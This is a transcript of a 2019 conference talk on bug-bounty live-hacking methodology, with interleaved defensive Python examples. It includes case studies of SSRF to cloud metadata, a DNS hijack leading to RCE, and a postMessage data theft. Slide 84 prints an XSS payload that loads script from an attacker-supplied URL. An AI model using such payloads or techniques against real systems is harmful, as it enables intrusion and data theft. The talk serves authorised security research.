
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big

Frans Rosén
March 30, 2019


These are the slides from my talk at the Facebook/Google-hosted event BountyCon 2019, held in Singapore on the 30th of March 2019.



Transcript

  2. Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
     Frans Rosén – @fransrosen
  3. Frans Rosén @fransrosen
     Security Advisor at Detectify
     #6 on HackerOne leaderboard/all-time
     Blogs at labs.detectify.com
  4. Frans Rosén @fransrosen
     H1-702 2017: Winner of MVH in Vegas! (Uber, Salesforce, Zenefits)
     H1-514 2018: Winner of MVH in Montreal! (Shopify)
     H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath)
     H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath)
     H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath)
     H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber)
     H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath)
     H1-202 2018: Winner Best bug in Washington (Mapbox)
     H1-3120 2018: Winner Best bug in Amsterdam (Dropbox)
     H1-514 2018: Winner Highest reputation in Montreal (Shopify)
  6. What is Live Hacking?

  7. 30 second elevator pitch
     • A "hacker-meets-dev face-to-face" bug bounty with special targets
     • First by HackerOne in 2016 in Vegas
     • More companies run these nowadays: H1, Bugcrowd, Facebook/Google, Visma. Smaller companies run their own as well.
  8. (Unofficial first event in 2015)
     Me and Justin Calmus, then CSO at Zenefits, drinking Old Fashioneds in Vegas: "We should bring some hackers together and hack"
  10. (Unofficial first event in 2015)
      Night after, 7 hackers in a suite at MGM
  11. $101.000 paid that night! I went home with $51.000 after 7 hours of hacking
  12. A quick step by step

  13–14. 1. Hackers get an intro and a walkthrough
      • Hangout, slides, presented by the company itself
      • Ability to ask questions
      2. Often a bigger scope
      • Often *.company.com, *.company.dev, infrastructure, IPs
      • Open source repos by the company
      • Enterprise access to products
      • One time social engineering(!)
  15–16. 3. Hackers get some time to do recon
      • This is a VERY important part
      • One time 48 hours. Hard!
      • Slack instance with the company!
      4. Some allow pre-submissions
      • Awesome! Less pressure on final day
      • Faster payouts on event day
  17. 5. Arriving at the event, meeting the company
      • At HQ or hacking event (Defcon, Black Hat, Nullcon etc)
      • Discussions here == PRICELESS!!
      • Valid bugs because I could discuss with the company:
        - This domain, what does it do?
        - Is this app supposed to work like this?
        - I noticed this weird behaviour, I think I can do this, what do you think?
  18. 6. Day of event. Wake up early, shower and HACK
      • If no pre-submissions, get reports in!
      • Hacking day is special, sit in teams, collaboration(!)
      • Found many bugs on the actual day!
  19. Some events without pre-submissions award "first X valid bugs"
  20. Enter bountyplz!

  21. github.com/fransr/bountyplz


  25. github.com/fransr/bountyplz
      Upcoming version, batch-mode
      • 24 reports sent in 4 seconds
  26. 7. Show & Tell
      • Best part of event
      • Customer picks bugs to be presented
      • Amazing! Other hackers’ bugs in a cool micro-talk style (5min max)
  27. Strategy/Methodology

  28. Strategy/Methodology
      The most interesting part. How to approach targets? This is my experience, others might do it differently!
  29. Good overview of scope
      Make sure you have/know:
      • credentials needed
      • what domains are included, subdomains/acquisitions
      • what NOT to focus on (out-of-scope)
      • upgrades to enterprise accounts if promised
  30. Teaming

  31. Teaming! Seriously, this is EXTREMELY VALUABLE
      I’ve made more money hacking as a team
  32–33. Teaming! Team up with someone that:
      • puts in "similar" effort to you
      • might know stuff you don't
      • helps you cover more target surface
      • you can communicate with and brainstorm
      Keep team small, 2-4. If 3 or more, effort will differ, allow to split differently.
      For 2 people, 50% each is always the simplest.
  34. What to focus on?

  35–36. High threshold or labour intensive testing
      • Best bugs!
      Example: trying all integrations from a list of 80. Read docs on how each worked.
      Found a $20k bug due to one (1!!!) faulty implementation!
  37–38. How SDK talks with API
      • Desktop client
      • Web (API-paths in JS-files)
      • PHP/Java/Golang-SDKs
      • npm/composer/yarn
      Legacy versions of APIs?
      • Older versions working?
      • Are there docs? Web-archive?

  39–40. Integrations with 3rd parties (!)
      • Have integrations? (Slack, Trello, Zapier etc)
      • Allow integrations? (OAuth etc)
      • Public repos with examples?
      Company's Github repos
      • What software they use (Forks)
      • Synced with original repo? (No: vulns by diffing versions?)

  41–42. Github
      • Internal domains? Search in Gists, Github, Google
      • "Internal indicators", search everywhere
      • Domains/AWS/GCP-tools in org: "org:xxx amazonaws" etc
      • Any users in organization?
      • Extract contributors from repos
      • Company name in users’ repos: "user:xxx company-name"
      • Search Github Issues, funky stuff by accident!
      • Non-forked repos in organization
        ‣ Package dependencies from employees?
        ‣ Still hired by the company? If not, bad
  43–44. Whitebox testing on company's FOSS
      • Bugs might mean bugs in prod!
      • Might mean company made other companies vulnerable (really bad PR for the company)
      LEGACY
      • Content from web-archive, read old documentation(!!!)
      • URLs from web-archive's CDX-api, commoncrawl etc.
      • Test all URLs. Distinguish status-codes / bytes received (Wfuzz)
      • Anything interesting? Filter file-types, deduplicate
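As an added example (my code, not from the talk or the bountyplz project), the filter-and-deduplicate step for archived URLs: a parser for the Wayback CDX API's default 7-field line format, run over a constructed sample, that collapses query values into one route per endpoint, drops static file types, and keeps the status codes and byte counts the slide says to compare.

```python
from urllib.parse import urlsplit, parse_qsl, urlunsplit

# Constructed sample in the Wayback CDX API's default 7-field line format:
# urlkey timestamp original mimetype statuscode digest length
SAMPLE_CDX = """\
com,example)/api/v1/users 20170301120000 https://example.com/api/v1/users?page=2 application/json 200 AAA111 1234
com,example)/api/v1/users 20180301120000 https://example.com/api/v1/users?page=7 application/json 200 AAA222 1250
com,example)/legacy/export.php 20160301120000 http://example.com/legacy/export.php?id=5&fmt=csv text/html 200 BBB111 980
com,example)/static/app.min.js 20190101000000 https://example.com/static/app.min.js application/javascript 200 CCC111 48213
com,example)/static/logo.png 20190101000000 https://example.com/static/logo.png image/png 200 DDD111 9000
com,example)/admin/old 20150301120000 https://example.com/admin/old text/html 301 EEE111 0
"""

# Static assets rarely carry server-side logic; drop them before testing.
SKIP_EXT = {".png", ".jpg", ".jpeg", ".gif", ".css", ".woff", ".woff2", ".svg", ".ico"}

def parse_cdx(text):
    """Yield one record per well-formed CDX line; malformed lines are skipped."""
    for line in text.splitlines():
        f = line.split()
        if len(f) != 7:
            continue
        yield {"ts": f[1], "url": f[2], "mime": f[3], "status": f[4], "length": int(f[6])}

def route_key(url):
    """Keep parameter names but drop their values, so /x?id=5 and /x?id=9
    collapse into the single route /x?id= that is worth testing once."""
    p = urlsplit(url)
    names = sorted({k for k, _ in parse_qsl(p.query, keep_blank_values=True)})
    query = "&".join(f"{k}=" for k in names)
    return urlunsplit((p.scheme, p.netloc.lower(), p.path, query, ""))

def unique_routes(text, skip_ext=SKIP_EXT):
    """Map each deduplicated route to when it was first archived and the set of
    status codes / byte counts seen, the two signals used to spot odd responses."""
    routes = {}
    for rec in parse_cdx(text):
        path = urlsplit(rec["url"]).path.lower()
        if any(path.endswith(ext) for ext in skip_ext):
            continue
        r = routes.setdefault(route_key(rec["url"]),
                              {"first_seen": rec["ts"], "status": set(), "bytes": set()})
        r["first_seen"] = min(r["first_seen"], rec["ts"])
        r["status"].add(rec["status"])
        r["bytes"].add(rec["length"])
    return routes

if __name__ == "__main__":
    for key, info in sorted(unique_routes(SAMPLE_CDX).items()):
        print(info["first_seen"], sorted(info["status"]), sorted(info["bytes"]), key)
```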
  45–46. Regular recon
      There is soooo much here we can't cover it all. These are general things:
      • DNS, Subbrute, sublist3r etc. So many tools!
        ‣ Customized subbrute with 3rd party data
        ‣ Generate DNS-wordlist based on findings
      • Existing routes from JS-files, Burp History
      • postMessage-tracker (logs all listener functions)
      • Wfuzz target (VPN with switchable IP if blocked)
      Best protip: Focus on BORING/HARD STUFF, other hackers won’t
  47. Notes
      While you hack. KISS!
      • Dir for target, TXT-file always open
      • Comments (snippets / indicators / urls)
      • Super helpful. Chaining bugs!
        - If an Open-Redirect, we can make a chain
      • Test-code, SDKs, screenshots in dir
      • Valid vulns in one place, separate from "interesting behaviour"
  48. Notes
      • On event, team up sharing "interesting behaviour" things
      • Burp history is golden, save it! Search a lot!
      Found bugs by searching:
  49. SSRF-testing server
      • ONLY reachable by internal network (Both ipv4/ipv6)
      • Virtual host / kubernetes node is bad, due to requirement of Host-header. Not all SSRF send proper Host-header (HTTP/1.0, binding external DNS-host to internal IP etc)
      • Different files, depends on SSRF: MP3, ICS, XML, TXT, HTML, PNG, JPG, SVG etc.
      • If internal hosts can be reached without scanning internal network. One company had flags in files, simple to prove you could access.
  50. SSRF-testing server
      Should be an open source project. Anyone up for it?
  52. Show & Tell!

  53. Unscoped JWT-token exposed in Squid proxy-error

  54. On-Premise/SaaS app

  55. Did not like internal requests

  56. But we see our own request headers
  57. And what about IPv6?

  58. Wow, a LOT more headers

  59. And here’s a JWT?

  60. Nothing in the JWT said anything about my instance
  61. Sent a report

  62. Sent a Slack-DM to the company and asked
  65. ?

  66. JWT-token could access everyone

  67. Fix! Unique ID instead of admin
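As an added example (my code, not the vendor's), the difference between the token as found and the fix on the slide: a minimal HS256 verifier, then the authorization check before and after binding the token to a single instance. The claim name `instance`, the subject values and the HMAC key are assumptions for the demo; a real service would use a vetted JWT library.

```python
import base64
import hashlib
import hmac
import json

def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_jwt(claims, key):
    """Minimal HS256 JWT, enough to mint the two tokens compared below."""
    header = _b64(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64(sig)}"

def verify_jwt(token, key):
    """Return the claims if the signature checks out, else None (alg pinned to HS256)."""
    try:
        header, body, sig = token.split(".")
        if json.loads(_unb64(header)).get("alg") != "HS256":
            return None
        expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64(sig)):
            return None
        return json.loads(_unb64(body))
    except (ValueError, json.JSONDecodeError):
        return None

def authorize_unscoped(token, key, requested_instance):
    """The pattern behind the bug: a valid token with sub=admin says nothing about
    which customer instance it belongs to, so one leaked token opens every instance."""
    claims = verify_jwt(token, key)
    return claims is not None and claims.get("sub") == "admin"

def authorize_scoped(token, key, requested_instance):
    """The fix: the token carries the unique ID of the instance it was minted for
    and the service compares it with the instance actually being requested."""
    claims = verify_jwt(token, key)
    if claims is None:
        return False
    return claims.get("instance") == requested_instance  # absent claim -> denied

if __name__ == "__main__":
    key = b"constructed-demo-key"
    leaked = sign_jwt({"sub": "admin"}, key)
    bound = sign_jwt({"sub": "svc-7f3a", "instance": "tenant-a"}, key)
    print("unscoped token on another instance:", authorize_unscoped(leaked, key, "tenant-b"))
    print("scoped token on another instance:", authorize_scoped(bound, key, "tenant-b"))
```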

  69. Second order RCE 4 hours later

  70–71. Burp Collaborator payload gave a hit! WTH??
  72. Let’s trigger "a few"

  73. Burp Intruder

  74. Header


  79. XSS on sandboxed domain stealing data from privileged domain
  80. Document-service ACME.COM | Create new doc

  81. Document-service ACME.COM | Create new doc | usersandbox.com | postMessage
  82. Document-service ACME.COM | Create new doc | usersandbox.com | postMessage {"document":"AAA…"}
  83. XSS in the sandbox usersandbox.com

  84. Chrome XSS auditor bypass
      </script>
      <script>
      x=document.createElement('script');
      x.src=atob('MY-URL-BASE64-ENCODED');
      document.body.appendChild(x)-'%0d',({//#
  85. User opens link from sandbox | usersandbox.com | ACME.COM | Create new doc
  86. User uploads doc, iframe opens | usersandbox.com | ACME.COM | Create new doc | usersandbox.com
  87. Hijack iframe, due to Same-Origin Policy | usersandbox.com | ACME.COM | Create new doc | usersandbox.com
  88. Uploads doc, postMessage | usersandbox.com | ACME.COM | usersandbox.com

  89. Iframe leaks data to attacker | usersandbox.com | ACME.COM | usersandbox.com
  90. We stole the document! | usersandbox.com | ACME.COM | usersandbox.com
  92. DNS-hijack leading to RCE

  93. DNS-hijack on internal.company.com!

  94. Not a new thing, watch my talk from Secfest 2017
  95. DNS-hijack on internal.company.com! Awesome, what now?

  96. Testing tool, only allowed their own subdomains
  98. Let’s create a subdomain to metadata

  100. IPv6 FTW!

  101. BOOM!

  102–104. Asking to go deeper. Nothing. Creds are limited :(
  105. User-data

  106. User-data S3-bucket

  107. And yeeees! Full read/write access to S3-bucket
  108. Files in bucket used in deploy-script

  109. Best bug of the event
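As an added example (my code, not the testing tool from the slides), the check that tool was missing: allowlisting the company's own subdomains by name is only safe if every address the name resolves to, A and AAAA alike, is also checked against internal ranges, because a hijacked or self-registered subdomain can point anywhere and the IPv6 metadata endpoint is as reachable as the IPv4 one. Hostnames and DNS answers below are constructed, and the resolver is injectable so the block runs offline.

```python
import ipaddress
import socket

# Ranges an internal fetcher must never reach, in both address families. The
# IPv4 metadata address alone is not enough: the slides' bug reached the
# metadata service over IPv6 once the IPv4 path was blocked.
BLOCKED = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16",        # link-local, includes 169.254.169.254 (metadata)
    "172.16.0.0/12", "192.168.0.0/16",
    "::/128", "::1/128",
    "fc00::/7",              # unique-local, includes the EC2 IMDS address fd00:ec2::254
    "fe80::/10",             # IPv6 link-local
)]

def is_blocked(ip):
    """True if ip falls in an internal/reserved range, after unwrapping
    IPv4-mapped IPv6 (::ffff:169.254.169.254), which would otherwise slip past."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED)

def resolve_all(host):
    """Every A and AAAA record for host via the system resolver."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}
    except socket.gaierror:
        return set()

def allowed_destination(host, allowed_suffix, resolver=resolve_all):
    """Allow host only if it is under allowed_suffix AND none of its addresses is
    internal. Resolve once and connect to the vetted address (not the name) to
    avoid a rebinding race between this check and the actual request."""
    if not host.lower().endswith(allowed_suffix.lower()):
        return False
    addrs = resolver(host)
    if not addrs:
        return False
    return not any(is_blocked(a) for a in addrs)

if __name__ == "__main__":
    # Constructed records standing in for DNS answers.
    fake_dns = {
        "api.company.com": {"203.0.113.10"},
        "meta.company.com": {"169.254.169.254"},
        "meta6.company.com": {"2001:db8::1", "fd00:ec2::254"},
    }
    for name in fake_dns:
        print(name, allowed_destination(name, ".company.com", fake_dns.get))
```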

  110. Final words
       1. Use the time before
       2. Consuming tasks no one bothers with
       3. Move around, but if interesting, be persistent!
       4. Work as a team, it’s amazing.
       Thank you!